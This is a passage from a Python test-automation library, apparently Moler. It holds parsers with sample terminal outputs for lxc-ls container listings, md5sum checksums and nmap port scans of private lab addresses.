0xe004 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe009 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00a RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00b RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00c RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00d RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe019 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
root@server~ >"""
COMMAND_KWARGS_2 = {
"options": "-f"
}
COMMAND_RESULT_2 = {
"RESULT": [
{
'Name': '0xe000',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe001',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe002',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe003',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe004',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe009',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00a',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00b',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00c',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00d',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe019',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
}
]
}
COMMAND_OUTPUT_3 = """
root@server~ >lxc-ls --nesting=3
0xe000 0xe000/0xe000 0xe000/0xe001 0xe000/0xe002 0xe000/0xe003 0xe000/0xe004 0xe000/0xe009 0xe000/0xe00a 0xe000/0xe00b 0xe000/0xe00c 0xe000/0xe00d
0xe000/0xe019 0xe001 0xe002 0xe002/0xe000 0xe002/0xe001 0xe002/0xe002 0xe002/0xe003 0xe002/0xe004 0xe002/0xe009 0xe002/0xe00a 0xe002/0xe00b
0xe002/0xe00c 0xe002/0xe00d 0xe002/0xe019 0xe003 0xe003/0xe000 0xe003/0xe001 0xe003/0xe002 0xe003/0xe003 0xe003/0xe004 0xe003/0xe009 0xe003/0xe00a
0xe003/0xe00b 0xe003/0xe00c 0xe003/0xe00d 0xe003/0xe019 0xe004 0xe004/0xe000 0xe004/0xe001 0xe004/0xe002 0xe004/0xe003 0xe004/0xe004 0xe004/0xe009
0xe004/0xe00a 0xe004/0xe00b 0xe004/0xe00c 0xe004/0xe00d 0xe004/0xe019 0xe009 0xe00a 0xe00a/0xe000 0xe00a/0xe001 0xe00a/0xe002 0xe00a/0xe003
0xe00a/0xe004 0xe00a/0xe009 0xe00a/0xe00a 0xe00a/0xe00b 0xe00a/0xe00c 0xe00a/0xe00d 0xe00a/0xe019 0xe00b 0xe00c 0xe00d 0xe019
0xe019/0xe000 0xe019/0xe001 0xe019/0xe002 0xe019/0xe003 0xe019/0xe004 0xe019/0xe009 0xe019/0xe00a 0xe019/0xe00b 0xe019/0xe00c 0xe019/0xe00d 0xe019/0xe019
root@server~ >"""
COMMAND_KWARGS_3 = {
"options": "--nesting=3"
}
COMMAND_RESULT_3 = {
"RESULT": [
['0xe000', '0xe000/0xe000', '0xe000/0xe001', '0xe000/0xe002', '0xe000/0xe003', '0xe000/0xe004', '0xe000/0xe009', '0xe000/0xe00a', '0xe000/0xe00b', '0xe000/0xe00c', '0xe000/0xe00d'],
['0xe000/0xe019', '0xe001', '0xe002', '0xe002/0xe000', '0xe002/0xe001', '0xe002/0xe002', '0xe002/0xe003', '0xe002/0xe004', '0xe002/0xe009', '0xe002/0xe00a', '0xe002/0xe00b'],
['0xe002/0xe00c', '0xe002/0xe00d', '0xe002/0xe019', '0xe003', '0xe003/0xe000', '0xe003/0xe001', '0xe003/0xe002', '0xe003/0xe003', '0xe003/0xe004', '0xe003/0xe009', '0xe003/0xe00a'],
['0xe003/0xe00b', '0xe003/0xe00c', '0xe003/0xe00d', '0xe003/0xe019', '0xe004', '0xe004/0xe000', '0xe004/0xe001', '0xe004/0xe002', '0xe004/0xe003', '0xe004/0xe004', '0xe004/0xe009'],
['0xe004/0xe00a', '0xe004/0xe00b', '0xe004/0xe00c', '0xe004/0xe00d', '0xe004/0xe019', '0xe009', '0xe00a', '0xe00a/0xe000', '0xe00a/0xe001', '0xe00a/0xe002', '0xe00a/0xe003'],
['0xe00a/0xe004', '0xe00a/0xe009', '0xe00a/0xe00a', '0xe00a/0xe00b', '0xe00a/0xe00c', '0xe00a/0xe00d', '0xe00a/0xe019', '0xe00b', '0xe00c', '0xe00d', '0xe019'],
['0xe019/0xe000', '0xe019/0xe001', '0xe019/0xe002', '0xe019/0xe003', '0xe019/0xe004', '0xe019/0xe009', '0xe019/0xe00a', '0xe019/0xe00b', '0xe019/0xe00c', '0xe019/0xe00d', '0xe019/0xe019']
]
}
"""
==================================================HELP=MESSAGE==========================================================
root@0xe000:~ >lxc-ls --help
Usage: lxc-ls
[-P lxcpath] [--active] [--running] [--frozen] [--stopped] [--nesting] [-g groups] [--filter regex]
[-1] [-P lxcpath] [--active] [--running] [--frozen] [--stopped] [--nesting] [-g groups] [--filter regex]
[-f] [-P lxcpath] [--active] [--running] [--frozen] [--stopped] [--nesting] [-g groups] [--filter regex]
lxc-ls list containers
Options :
-1, --line show one entry per line
-f, --fancy use a fancy, column-based output
-F, --fancy-format comma separated list of columns to show in the fancy output
valid columns are: NAME, STATE, PID, RAM, SWAP, AUTOSTART,
GROUPS, INTERFACE, IPV4 and IPV6
--active list only active containers
--running list only running containers
--frozen list only frozen containers
--stopped list only stopped containers
--defined list only defined containers
--nesting=NUM list nested containers up to NUM (default is 5) levels of nesting
--filter=REGEX filter container names by regular expression
-g --groups comma separated list of groups a container must have to be displayed
Common options :
-o, --logfile=FILE Output log to FILE instead of stderr
-l, --logpriority=LEVEL Set log priority to LEVEL
-q, --quiet Don't produce any output
-P, --lxcpath=PATH Use specified container path
-?, --help Give this help list
--usage Give a short usage message
--version Print the version number
Mandatory or optional arguments to long options are also mandatory or optional
for any corresponding short options.
See the lxc-ls man page for further information.
root@0xe000:~ >
"""
```
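The whitespace/comma splitting used by `_parse_table_row` is the subtle part of this command. The standalone sketch below (plain `re`, a shortened address list, no Moler machinery) reproduces how one `-f` row becomes a result dictionary:

```python
import re

headers = ['Name', 'State', 'Autostart', 'Groups', 'IPv4', 'IPv6']
row = "0xe000 RUNNING 0 - 10.1.1.1, 10.1.1.2, 192.168.255.253 -"

values = re.split(r'([^,])\s+', row)
rejoined = []
i = 0
while i < len(values) - 1:
    rejoined.append(values[i] + values[i + 1])  # glue the captured character back on
    i += 2
if len(values) % 2 != 0:
    rejoined.append(values[-1])

print(dict(zip(headers, rejoined)))
# {'Name': '0xe000', 'State': 'RUNNING', 'Autostart': '0', 'Groups': '-',
#  'IPv4': '10.1.1.1, 10.1.1.2, 192.168.255.253', 'IPv6': '-'}
```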
#### File: cmd/unix/md5sum.py
```python
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import ParsingDone
import re
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
class Md5sum(GenericUnixCommand):
def __init__(self, connection, path, options=None, prompt=None, newline_chars=None, runner=None):
super(Md5sum, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.path = path
self.options = options
def build_command_string(self):
cmd = "md5sum"
if self.options:
cmd = "{} {} {}".format(cmd, self.path, self.options)
else:
cmd = "{} {}".format(cmd, self.path)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_line(line)
except ParsingDone:
pass
return super(Md5sum, self).on_new_line(line, is_full_line)
_re_parse_line = re.compile(r'(?P<SUM>[\da-f]{32})\s+(?P<FILE>\S+)')
def _parse_line(self, line):
if self._regex_helper.search_compiled(Md5sum._re_parse_line, line):
self.current_ret['SUM'] = self._regex_helper.group("SUM")
self.current_ret['FILE'] = self._regex_helper.group("FILE")
raise ParsingDone
COMMAND_OUTPUT_parms = """
ute@debdev:~$ md5sum test.txt
91503d6cac7a663901b30fc400e93644 test.txt
ute@debdev:~$
"""
COMMAND_RESULT_parms = {
'FILE': u'test.txt',
'SUM': u'91503d6cac7a663901b30fc400e93644'
}
COMMAND_KWARGS_parms = {
"path": "test.txt",
}
```
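Like the other commands in this package, `Md5sum` is usually obtained from a configured Moler device rather than instantiated by hand. The sketch below is only indicative: the config file name, device name and file path are hypothetical, and the `cmd_name`-to-class mapping is assumed to follow Moler's usual lowercase-module convention:

```python
from moler.config import load_config
from moler.device import DeviceFactory

load_config(config='devices.yml')                 # hypothetical config defining a 'MyUnix' device
unix = DeviceFactory.get_device(name='MyUnix')    # hypothetical device name

md5_cmd = unix.get_cmd(cmd_name="md5sum", cmd_params={"path": "test.txt"})
result = md5_cmd()                                # blocking call; returns the parsed dict
print(result["SUM"], result["FILE"])
```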
#### File: cmd/unix/nmap.py
```python
__author__ = '<NAME>, <NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>,' \
'<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import ParsingDone
from moler.exceptions import CommandFailure
from moler.util.converterhelper import ConverterHelper
class Nmap(GenericUnixCommand):
def __init__(self, connection, ip, is_ping=False, options=None, prompt=None, newline_chars=None, runner=None):
"""
:param connection: Moler connection to device, terminal when command is executed.
:param ip: IP address of host.
:param is_ping: If True then skip host discovery.
:param options: Options of command nmap.
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
"""
super(Nmap, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.ip = ip
self.is_ping = is_ping
self.timeout = 120 # Time in seconds
self._converter_helper = ConverterHelper.get_converter_helper()
def build_command_string(self):
"""
:return: String representation of command to send over connection to device.
"""
cmd = "nmap"
if self.options:
cmd = "{} {}".format(cmd, self.options)
cmd = "{} {}".format(cmd, self.ip)
if not self.is_ping:
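            # -PN (newer nmap spells it -Pn) disables host discovery and treats the target
            # as up, so port scanning proceeds even when ping probes are blocked.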
cmd = "{} -PN".format(cmd)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
self._parse_extend_timeout(line)
try:
self._parse_error(line)
self._parse_ports_line(line)
self._parse_raw_packets(line)
self._parse_scan_report(line)
self._parse_scan_reports(line)
self._parse_syn_stealth_scan(line)
self._parse_skipping_host(line)
self._parse_ciphers(line)
except ParsingDone:
pass
return super(Nmap, self).on_new_line(line, is_full_line)
_re_ports_line = re.compile(r"^(?P<LINES>(?P<PORTS>(?P<PORT>\d+)\/(?P<TYPE>\w+))\s+"
r"(?P<STATE>\S+)\s+(?P<SERVICE>\S+)\s*(?P<REASON>\S+)?\s*)$")
def _parse_ports_line(self, line):
if self._regex_helper.search_compiled(Nmap._re_ports_line, line):
if "PORTS" not in self.current_ret:
self.current_ret["PORTS"] = dict()
if "LINES" not in self.current_ret["PORTS"]:
self.current_ret["PORTS"]["LINES"] = list()
ports = self._regex_helper.group("PORTS")
self.current_ret["PORTS"][ports] = self._regex_helper.groupdict()
self.current_ret["PORTS"]["LINES"].append(self._regex_helper.group("LINES"))
del (self.current_ret["PORTS"][ports]["PORTS"])
del (self.current_ret["PORTS"][ports]["LINES"])
raise ParsingDone
# Raw packets sent: 65544 (2.884MB) | Rcvd: 65528 (2.621MB)
_re_raw_packets = re.compile(r"Raw packets sent: (?P<SENT_NO>\d+)\s+\((?P<SENT_SIZE>\S+)\)\s+"
r"\|\s+Rcvd:\s+(?P<RCVD_NO>\d+)\s+\((?P<RCVD_SIZE>\S+)\)")
def _parse_raw_packets(self, line):
if self._regex_helper.search_compiled(Nmap._re_raw_packets, line):
if "RAW_PACKETS" not in self.current_ret:
self.current_ret["RAW_PACKETS"] = dict()
self.current_ret["RAW_PACKETS"] = self._regex_helper.groupdict()
raise ParsingDone
# Nmap scan report for 192.168.255.4 [host down, received no-response]
_re_scan_report = re.compile(r"(?P<LINE>Nmap scan report for (?P<ADDRESS>\S+)\s+\[host\s+"
r"(?P<HOST>\S+),\s+received\s+(?P<RECEIVED>\S+)\])")
def _parse_scan_report(self, line):
if self._regex_helper.search_compiled(Nmap._re_scan_report, line):
if "SCAN_REPORT" not in self.current_ret:
self.current_ret["SCAN_REPORT"] = dict()
self.current_ret["SCAN_REPORT"] = self._regex_helper.groupdict()
raise ParsingDone
# Nmap scan report for 192.168.255.132
_re_scan_reports = re.compile(r"(?P<LINE>Nmap scan report for (?P<ADDRESS>\S+)"
r"(?:\s+\[host\s+(?P<HOST>\S+),\s+received\s+(?P<RECEIVED>\S+)\])?)")
def _parse_scan_reports(self, line):
if self._regex_helper.search_compiled(Nmap._re_scan_reports, line):
if "SCAN_REPORTS" not in self.current_ret:
self.current_ret["SCAN_REPORTS"] = list()
self.current_ret["SCAN_REPORTS"].append(self._regex_helper.groupdict())
raise ParsingDone
# if "HOST" not in self.current_ret["SKIPPING_HOST"]:
# self.current_ret["SKIPPING_HOST"]["HOST"] = list()
# self.current_ret["SKIPPING_HOST"]["HOST"].append(self._regex_helper.group("HOST"))
# SYN Stealth Scan Timing: About 78.01% done; ETC: 23:30 (0:00:52 remaining)
_re_syn_stealth_scan = re.compile(r"SYN Stealth Scan Timing: About (?P<DONE>[\d\.]+)% done; "
r"ETC: (?P<ETC>[\d:]+) \((?P<REMAINING>[\d:]+) remaining\)")
def _parse_syn_stealth_scan(self, line):
if self._regex_helper.search_compiled(Nmap._re_syn_stealth_scan, line):
if "SYN_STEALTH_SCAN" not in self.current_ret:
self.current_ret["SYN_STEALTH_SCAN"] = dict()
self.current_ret["SYN_STEALTH_SCAN"] = self._regex_helper.groupdict()
raise ParsingDone
# Failed to open normal output file /logs/IP_Protocol_Discovery_BH_IPv4.nmap for writing
_re_fail_file = re.compile(r"Failed to open.*file", re.I)
def _parse_error(self, line):
if self._regex_helper.search_compiled(Nmap._re_fail_file, line):
self.set_exception(CommandFailure(self, "Fail in line: '{}'".format(line)))
raise ParsingDone()
# Skipping host 10.9.134.1 due to host timeout
_re_skipping_host = re.compile(r"Skipping host (?P<HOST>\S+) due to host timeout")
def _parse_skipping_host(self, line):
if self._regex_helper.search_compiled(Nmap._re_skipping_host, line):
if "SKIPPING_HOST" not in self.current_ret:
self.current_ret["SKIPPING_HOST"] = dict()
if "HOST" not in self.current_ret["SKIPPING_HOST"]:
self.current_ret["SKIPPING_HOST"]["HOST"] = list()
self.current_ret["SKIPPING_HOST"]["HOST"].append(self._regex_helper.group("HOST"))
raise ParsingDone
# UDP Scan Timing: About 61.09% done; ETC: 14:18 (0:21:04 remaining)
_re_extend_timeout = re.compile(r"\((?P<HOURS>\d+):(?P<MINUTES>\d+):(?P<SECONDS>\d+)\s+remaining\)")
def _parse_extend_timeout(self, line):
if self._regex_helper.search_compiled(Nmap._re_extend_timeout, line):
timedelta = self._converter_helper.to_number(
self._regex_helper.group("HOURS")) * 3600 + self._converter_helper.to_number(
self._regex_helper.group("MINUTES")) * 60 + self._converter_helper.to_number(
self._regex_helper.group("SECONDS"))
self.extend_timeout(timedelta=timedelta)
# | TLS_ABC_RSA_WITH_AED_256_GCB_SHA123
_re_cipher = re.compile(r"\|\s*(?P<CIPHER>TLS_[^\s]+)")
def _parse_ciphers(self, line):
if self._regex_helper.search_compiled(Nmap._re_cipher, line):
if "CIPHERS" not in self.current_ret:
self.current_ret["CIPHERS"] = list()
self.current_ret["CIPHERS"].append(self._regex_helper.group("CIPHER"))
raise ParsingDone
COMMAND_OUTPUT_host_up = """
root@cp19-nj:/home/ute# nmap -d1 -p- -S 192.168.255.126 192.168.255.129 -PN
Starting Nmap 6.00 ( http://nmap.org ) at 2018-05-23 08:36 CST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
Initiating ARP Ping Scan at 08:36
Scanning 192.168.255.129 [1 port]
Packet capture filter (device eth1): arp and arp[18:4] = 0xFE365EB1 and arp[22:2] = 0x1AE6
Completed ARP Ping Scan at 08:36, 0.03s elapsed (1 total hosts)
Overall sending rates: 34.08 packets / s, 1431.20 bytes / s.
mass_rdns: Using DNS server 192.168.3.11
mass_rdns: Using DNS server 172.16.31.10
Initiating Parallel DNS resolution of 1 host. at 08:36
mass_rdns: 13.00s 0/1 [#: 2, OK: 0, NX: 0, DR: 0, SF: 0, TR: 4]
Completed Parallel DNS resolution of 1 host. at 08:36, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 2, OK: 0, NX: 0, DR: 1, SF: 0, TR: 4, CN: 0]
Initiating SYN Stealth Scan at 08:36
Scanning 192.168.255.129 [65535 ports]
Packet capture filter (device eth1): dst host 192.168.255.126 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.255.129)))
Discovered open port 443/tcp on 192.168.255.129
Discovered open port 6001/tcp on 192.168.255.129
Discovered open port 12000/tcp on 192.168.255.129
Discovered open port 3300/tcp on 192.168.255.129
Discovered open port 12001/tcp on 192.168.255.129
Completed SYN Stealth Scan at 08:36, 4.31s elapsed (65535 total ports)
Overall sending rates: 15200.28 packets / s, 668812.33 bytes / s.
Nmap scan report for 192.168.255.129
Host is up, received arp-response (0.00049s latency).
Scanned at 2018-05-23 08:36:34 CST for 18s
Not shown: 65522 closed ports
Reason: 65522 resets
PORT STATE SERVICE REASON
21/tcp filtered ftp no-response
22/tcp filtered ssh no-response
443/tcp open https syn-ack
3300/tcp open unknown syn-ack
6001/tcp open X11:1 syn-ack
12000/tcp open cce4x syn-ack
12001/tcp open entextnetwk syn-ack
15001/tcp filtered unknown no-response
15002/tcp filtered unknown no-response
15003/tcp filtered unknown no-response
15004/tcp filtered unknown no-response
15005/tcp filtered unknown no-response
15007/tcp filtered unknown no-response
MAC Address: 74:DA:EA:53:D6:24 (Unknown)
Final times for host: srtt: 490 rttvar: 90 to: 100000
Read from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 17.52 seconds
Raw packets sent: 65544 (2.884MB) | Rcvd: 65528 (2.621MB)
root@cp19-nj:/home/ute# """
COMMAND_KWARGS_host_up = {'options': '-d1 -p- -S 192.168.255.126',
'ip': '192.168.255.129'}
COMMAND_RESULT_host_up = {
'PORTS': {
'LINES': [
'21/tcp filtered ftp no-response',
'22/tcp filtered ssh no-response',
'443/tcp open https syn-ack',
'3300/tcp open unknown syn-ack',
'6001/tcp open X11:1 syn-ack',
'12000/tcp open cce4x syn-ack',
'12001/tcp open entextnetwk syn-ack',
'15001/tcp filtered unknown no-response',
'15002/tcp filtered unknown no-response',
'15003/tcp filtered unknown no-response',
'15004/tcp filtered unknown no-response',
'15005/tcp filtered unknown no-response',
'15007/tcp filtered unknown no-response'
],
'21/tcp': {
'PORT': '21',
'REASON': 'no-response',
'SERVICE': 'ftp',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'22/tcp': {
'PORT': '22',
'REASON': 'no-response',
'SERVICE': 'ssh',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'443/tcp': {
'PORT': '443',
'REASON': 'syn-ack',
'SERVICE': 'https',
'STATE': 'open',
'TYPE': 'tcp'
},
'3300/tcp': {
'PORT': '3300',
'REASON': 'syn-ack',
'SERVICE': 'unknown',
'STATE': 'open',
'TYPE': 'tcp'
},
'6001/tcp': {
'PORT': '6001',
'REASON': 'syn-ack',
'SERVICE': 'X11:1',
'STATE': 'open',
'TYPE': 'tcp'
},
'12000/tcp': {
'PORT': '12000',
'REASON': 'syn-ack',
'SERVICE': 'cce4x',
'STATE': 'open',
'TYPE': 'tcp'
},
'12001/tcp': {
'PORT': '12001',
'REASON': 'syn-ack',
'SERVICE': 'entextnetwk',
'STATE': 'open',
'TYPE': 'tcp'
},
'15001/tcp': {
'PORT': '15001',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15002/tcp': {
'PORT': '15002',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15003/tcp': {
'PORT': '15003',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15004/tcp': {
'PORT': '15004',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15005/tcp': {
'PORT': '15005',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15007/tcp': {
'PORT': '15007',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
}
},
'RAW_PACKETS': {
'RCVD_NO': '65528',
'RCVD_SIZE': '2.621MB',
'SENT_NO': '65544',
'SENT_SIZE': '2.884MB'
},
'SCAN_REPORTS': [{u'ADDRESS': u'192.168.255.129',
u'HOST': None,
u'LINE': u'Nmap scan report for 192.168.255.129',
u'RECEIVED': None}]
}
COMMAND_OUTPUT_host_down = """root@cp19-nj:/home/ute# nmap -d1 -p- -S 192.168.255.126 192.168.255.4 -PN
Starting Nmap 6.00 ( http://nmap.org ) at 2018-05-25 08:40 CST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
Initiating ARP Ping Scan at 08:40
Scanning 192.168.255.4 [1 port]
Packet capture filter (device eth1): arp and arp[18:4] = 0xFE365EB1 and arp[22:2] = 0x1AE6
Completed ARP Ping Scan at 08:40, 0.43s elapsed (1 total hosts)
Overall sending rates: 4.61 packets / s, 193.61 bytes / s.
mass_rdns: Using DNS server 192.168.3.11
mass_rdns: Using DNS server 172.16.31.10
Nmap scan report for 192.168.255.4 [host down, received no-response]
Read from /usr/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (0 hosts up) scanned in 0.54 seconds
Raw packets sent: 2 (56B) | Rcvd: 0 (0B)
root@cp19-nj:/home/ute# """
COMMAND_KWARGS_host_down = {'options': '-d1 -p- -S 192.168.255.126',
'ip': '192.168.255.4'}
COMMAND_RESULT_host_down = {
'RAW_PACKETS': {
